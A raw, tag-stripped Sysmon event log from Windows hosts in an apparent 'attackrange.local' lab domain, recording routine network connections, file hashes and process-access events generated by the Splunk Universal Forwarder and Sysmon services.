354300x8000000000000000808986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:21.298{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57369-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:22.447{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0073C6B0744B791CBC289BEB3F99B7B,SHA256=F920AC1DD85C2E34CA74000E8450FC483A67F0D2F096506D6EAD7DD394BB061B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:23.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311569B2FE07E2DF4A0B96CFD89D7E37,SHA256=0D6450848BC797E488189A9612CEE9F2B9370C96BE685B75BE8FF1A89A65E995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:23.462{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D1A38797A9CCF4A2B2CBD214023504E,SHA256=8A0C09A4BCB0AA46DF51BD3CF92B0FD00252004AA1F2A7A86099D63B05159A03,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000809002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.525{0C1E0330-F698-60EB-AB79-00000000D001}39323348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.478{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A17702CB2159088B138DE0FD02BA3631,SHA256=C376D42C9AA4F44E7C5806DEB396FF3B38D7948517CB230C372B63896179E25D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.338{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.884{0C1E0330-F699-60EB-AD79-00000000D001}18681876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.743{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.743{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.743{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 